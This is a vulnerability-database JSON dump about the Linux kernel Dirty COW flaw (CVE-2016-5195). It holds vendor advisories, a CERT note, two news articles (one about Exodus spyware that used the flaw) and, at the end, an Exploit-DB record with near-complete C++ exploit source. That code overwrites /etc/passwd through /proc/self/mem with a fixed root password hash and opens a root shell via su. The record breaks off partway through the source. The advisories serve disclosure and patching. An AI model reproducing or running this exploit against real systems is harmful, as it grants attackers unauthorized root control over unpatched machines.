"https://access.redhat.com/errata/RHSA-2016:2132", "type": "redhat", "title": "(RHSA-2016:2132) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:44", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2018-06-06T20:24:30", "published": "2016-10-26T00:57:14", "id": "RHSA-2016:2105", "href": "https://access.redhat.com/errata/RHSA-2016:2105", "type": "redhat", "title": "(RHSA-2016:2105) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:14", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating\nsystem.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory mappings.\nAn unprivileged, local user could use this flaw to gain write access to\notherwise read-only memory mappings and thus increase their privileges on the\nsystem. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n", "modified": "2017-09-08T11:56:15", "published": "2016-10-31T04:00:00", "id": "RHSA-2016:2126", "href": "https://access.redhat.com/errata/RHSA-2016:2126", "type": "redhat", "title": "(RHSA-2016:2126) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-10-22T13:22:50", "bulletinFamily": "unix", "description": "A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private read-only\nmemory mappings. An unprivileged local user could use this flaw to gain\nwrite access to otherwise read-only memory mappings and thus increase\ntheir privileges on the system.", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-October/000742.html", "id": "ASA-201610-14", "type": "archlinux", "title": "linux: privilege escalation", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T17:22:50", "bulletinFamily": "unix", "description": "A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private read-only\nmemory mappings. An unprivileged local user could use this flaw to gain\nwrite access to otherwise read-only memory mappings and thus increase\ntheir privileges on the system.", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-October/000739.html", "id": "ASA-201610-11", "type": "archlinux", "title": "linux-lts: privilege escalation", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2019-11-06T16:05:28", "bulletinFamily": "unix", "description": "**a. Local privilege escalation vulnerability in Linux kernel \n**\n\nThe Linux kernel which ships with the base operating system of VMware Appliances contains a race condition in the way its memory subsystem handles copy-on-write (aka \u201cDirty COW\u201d). Successful exploitation of the vulnerability may allow for local privilege escalation. The product lines listed in this advisory have been confirmed to be affected. VMware product lines that are not affected are documented in VMware [Knowledge Base article 2147515](<https://kb.vmware.com/kb/2147515>). \n\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2016-5195 to this issue. \n\nColumn 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "modified": "2016-11-22T00:00:00", "published": "2016-11-09T00:00:00", "id": "VMSA-2016-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0018.html", "title": "VMware product updates address local privilege escalation vulnerability in Linux kernel", "type": "vmware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-05-27T18:57:32", "bulletinFamily": "info", "description": "### Overview \n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem, which may be leveraged locally to gain root privileges.\n\n### Description \n\n[**CWE-362**](<https://cwe.mitre.org/data/definitions/362.html>)**: Concurrent Execution using Shared Resource with Improper Synchonization ('Race Condition') -** CVE-2016-5195\n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem. A local attacker may leverage this vulnerability in affected systems to gain root privileges. For more information, including proofs of concept, refer to the [Dirty COW disclosure page](<https://dirtycow.ninja/>). \n \nNote that this vulnerability is reported as being actively exploited in the wild. \n \n--- \n \n### Impact \n\nA local, unprivileged attacker can escalate privileges to root. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nLinux kernel versions [4.8.3](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>), [4.7.9](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>), and [4.4.26](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>) address this vulnerability. [Red Hat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>), and [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) have released patches. Users should apply patches through their Linux distributions' normal update process. \n \n--- \n \n### Vendor Information\n\n243144\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### CentOS Affected\n\nNotified: October 21, 2016 Updated: October 27, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://www.centos.org/forums/viewtopic.php?f=51&amp;t=59782&amp;hilit=CVE%202016%205195&amp;start=10](<https://www.centos.org/forums/viewtopic.php?f=51&t=59782&hilit=CVE%202016%205195&start=10>)\n\n### CoreOS Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://coreos.com/blog/CVE-2016-5195.html>\n\n### Debian GNU/Linux Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.debian.org/security/2016/dsa-3696>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n\n### Red Hat, Inc. Affected\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n\n### SUSE Linux __ Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSUSE and the openSUSE project are affected by this issue and we have released updates. \n \n<https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Ubuntu Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n\n### Arista Networks, Inc. __ Not Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n**Statement Date: October 24, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nArista Network's software products EOS and Cloud Vision Portal (CVP) are not exploitable by CVE-2016-5195 (Kernel Local Privilege Escalation). \n \nFor further information: \n<https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Peplink __ Not Affected\n\nUpdated: November 17, 2016 \n\n**Statement Date: November 17, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWanting to state that Peplink Pepwave products are not affected by Dirty COW \n \nOur own announcement: \n<https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Arch Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### Tizen Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\nView all 16 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.6 | E:F/RL:OF/RC:C \nEnvironmental | 5.6 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://dirtycow.ninja/>\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>\n * <https://cwe.mitre.org/data/definitions/362.html>\n\n### Acknowledgements\n\nRed Hat credits Phil Oester with reporting this vulnerability.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-5195](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195>) \n---|--- \n**Date Public:** | 2016-10-20 \n**Date First Published:** | 2016-10-21 \n**Date Last Updated: ** | 2016-11-17 13:17 UTC \n**Document Revision: ** | 15 \n", "modified": "2016-11-17T13:17:00", "published": "2016-10-21T00:00:00", "id": "VU:243144", "href": "https://www.kb.cert.org/vuls/id/243144", "type": "cert", "title": "Linux kernel memory subsystem copy on write mechanism contains a race condition vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:18:04", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-iDWfxV-PPM8/WAnl79IpuHI/AAAAAAAAp5Y/5lTGfIqtuFYbi_zfNU_ORAiUfLceVljCACLcB/s1600/dirty-cow-linux-kernel-exploit.png>)\n\nA nine-year-old critical vulnerability has been discovered in virtually all versions of the Linux operating system and is actively being exploited in the wild. \n \nDubbed \"**Dirty COW**,\" the Linux kernel security flaw (CVE-2016-5195) is a mere privilege-escalation vulnerability, but researchers are taking it extremely seriously due to many reasons. \n \nFirst, it's very easy to develop exploits that work reliably. Secondly, the Dirty COW flaw exists in a section of the Linux kernel, which is a part of virtually every distro of the open-source operating system, including RedHat, Debian, and Ubuntu, released for almost a decade. \n \nAnd most importantly, the researchers have discovered attack code that indicates the Dirty COW vulnerability is being actively exploited in the wild. \n \nDirty COW potentially allows any installed malicious app to gain administrative (root-level) access to a device and completely hijack it within just 5 seconds. \n \nEarlier this week, [Linus Torvalds admitted](<https://lkml.org/lkml/2016/10/19/860>) that 11 years ago he first spotted this issue and also tried to fix it, but then he left it unpatched because at the time it was hard to trigger. \n \n\n\n### Why is the Flaw called Dirty COW?\n\n \nThe bug, marked as \"High\" priority, gets its name from the copy-on-write (COW) mechanism in the Linux kernel, which is so broken that any application or malicious program can tamper with read-only root-owned executable files and setuid executables. \n\n\n> \"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings,\" reads the [website](<http://dirtycow.ninja/>) dedicated to Dirty COW. \n\n> \"An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\"\n\nThe Dirty COW vulnerability has been present in the Linux kernel since version 2.6.22 in 2007, and is also believed to be present in Android, which is powered by the Linux kernel. \n \n\n\n### Patch Your Linux-powered Systems Immediately\n\n \nAccording to the website, the Linux kernel has been patched, and major vendors such as [RedHat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) and [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>) have already rolled out fixes for their respective Linux distributions. \n \nOrganizations and individuals have been urged to install a patch for their Linux-powered systems, phones and gadgets as soon as possible and risk falling victim in order to kill off the Linux kernel-level security flaw affecting nearly every distro of the open-source OS. \n \nThe vulnerability was discovered by security researcher Phil Oester, who fund at least one in-the-wild attack exploiting this particular vulnerability. He found the exploit using an HTTP packet capture. \n\n\nThe vulnerability disclosure followed the tradition of branding high-profile security vulnerabilities like [Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>), [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>), [FREAK](<https://thehackernews.com/2015/03/freak-openssl-vulnerability.html>), and [GHOST](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>). \n \nThe Dirty COW website states: \n\n\n> \"It would have been fantastic to eschew this ridiculousness because we all make fun of branded vulnerabilities too, but this was not the right time to make that stand. So we created a website, an online shop, a Twitter account, and used a logo that a professional designer created.\"\n\nYou can find more technical details about the Dirty COW vulnerability and exploit on the bug's official [website](<http://dirtycow.ninja/>), [RedHat](<https://access.redhat.com/security/vulnerabilities/2706661>) site, and [GitHub](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>) page.\n", "modified": "2016-10-25T15:07:13", "published": "2016-10-20T23:02:00", "id": "THN:B571C1AAA8CDDC10150ABA0BF22B19E6", "href": "https://thehackernews.com/2016/10/linux-kernel-exploit.html", "type": "thn", "title": "Dirty COW \u2014 Critical Linux Kernel Flaw Being Exploited in the Wild", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-09T07:54:53", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-FYiOvknu4vY/XKxF4mYpV2I/AAAAAAAAztw/qfugwyFZSvUfDpDrIn4JxRzNFmIunzEjwCLcBGAs/s728-e100/ios-malware-min.jpg>)\n\nCybersecurity researchers have discovered an iOS version of the powerful mobile phone surveillance app that was initially targeting Android devices through apps on the official Google Play Store. \n \nDubbed **Exodus**, as the malware is called, the iOS version of the spyware was discovered by security researchers at LookOut during their analysis of its Android samples they had found last year. \n \nUnlike its Android variant, the iOS version of Exodus has been distributed outside of the official App Store, primarily through phishing websites that imitate Italian and Turkmenistani mobile carriers. \n\n\n \nSince Apple restricts direct installation of apps outside of its official app store, the iOS version of Exodus is abusing the Apple Developer Enterprise program, which allows enterprises to distribute their own in-house apps directly to their employees without needing to use the iOS App Store. \n \n\n\n> \"Each of the phishing sites contained links to a distribution manifest, which contained metadata such as the application name, version, icon, and a URL for the IPA file,\" the researchers say in a [blog post](<https://blog.lookout.com/esurv-research>). \n \n\"All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L.\"\n\n \nThough the iOS variant is less sophisticated than its Android counterpart, the spyware can still be able to exfiltrate information from targeted iPhone devices including, contacts, audio recordings, photos, videos, GPS location, and device information. \n \nThe stolen data is then transmitted via HTTP PUT requests to an endpoint on the attackers controlled command and control server, which is the same CnC infrastructure as the Android version and uses similar communications protocols. \n\n\n[](<https://1.bp.blogspot.com/-bbiYR-lAE7Y/XKw-4K1NxFI/AAAAAAAAztY/7pLITJjk3Tg_hA18skRD3OG-OLKlQmsOwCLcBGAs/s728-e100/ios-malware-apple-enterprise-developer-program.png>)\n\n \nSeveral technical details indicated that Exodus was \"likely the product of a well-funded development effort\" and aimed to target the government or law-enforcement sectors. \n \n\n\n> \"These included the use of certificate pinning and public key encryption for C2 communications, geo-restrictions imposed by the C2 when delivering the second stage, and the comprehensive and well-implemented suite of surveillance features,\" the researchers say.\n\n \nDeveloped by Italy-based company called Connexxa S.R.L., Exodus came to light late last month when white hat hackers from Security Without Borders [discovered](<https://securitywithoutborders.org/blog/2019/03/29/exodus.html>) nearly 25 different apps disguised as service applications on Google Play Store, which the tech giant removed after being notified. \n \nUnder development for at least five years, Exodus for Android usually consists of three distinct stages. First, there is a small dropper that collected basic identifying information, like the IMEI and phone number, about the targeted device. \n\n\n \nThe second stage consists of multiple binary packages that deploy a well-implemented suite of surveillance functionalities. \n \nFinally, the third stage uses the infamous [DirtyCOW](<https://thehackernews.com/2017/09/dirty-cow-android-malware.html>) exploit ([CVE-2016-5195](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>)) to gain root control over the infected phones. Once successfully installed, Exodus can carry out an extensive amount of surveillance. \n \nThe Android variant is also designed to keep running on the infected device even when the screen is switched off. \n \nWhile the Android version of Exodus had potentially infected \"several hundreds if not a thousand or more\" devices, it's not clear how many iPhones were infected by the iOS Exodus variant. \n \nAfter being notified of the spyware by the Lookout researchers, Apple revoked the enterprise certificate, preventing malicious apps from being installed on new iPhones and run on infected devices. \n \nThis is the second instance in the past year when an Italian software company has been caught distributing spyware. Earlier last year, another undisclosed Italian firm was found distributing \"**Skygofree**,\" a [dangerous Android spying tool](<https://thehackernews.com/2018/01/android-spying-malware.html>) that gives hackers full control of infected devices remotely.\n", "modified": "2019-04-09T07:19:48", "published": "2019-04-09T07:19:00", "id": "THN:6681D64EFC53E13356AF1184CE1D6024", "href": "https://thehackernews.com/2019/04/exodus-ios-malware.html", "type": "thn", "title": "'Exodus' Surveillance Malware Found Targeting Apple iOS Users", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-11-29T17:23:22", "bulletinFamily": "exploit", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd). CVE-2016-5195. Local exploit for Linux platform", "modified": "2016-11-27T00:00:00", "published": "2016-11-27T00:00:00", "id": "EDB-ID:40847", "href": "https://www.exploit-db.com/exploits/40847/", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n\r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n\r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n\r\nusing namespace std;\r\n\r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n\r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n\r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n\r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n\r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n\r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n\r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n\r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n\r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n\r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n\r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n\r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n\r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n\r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n\r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n\r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n 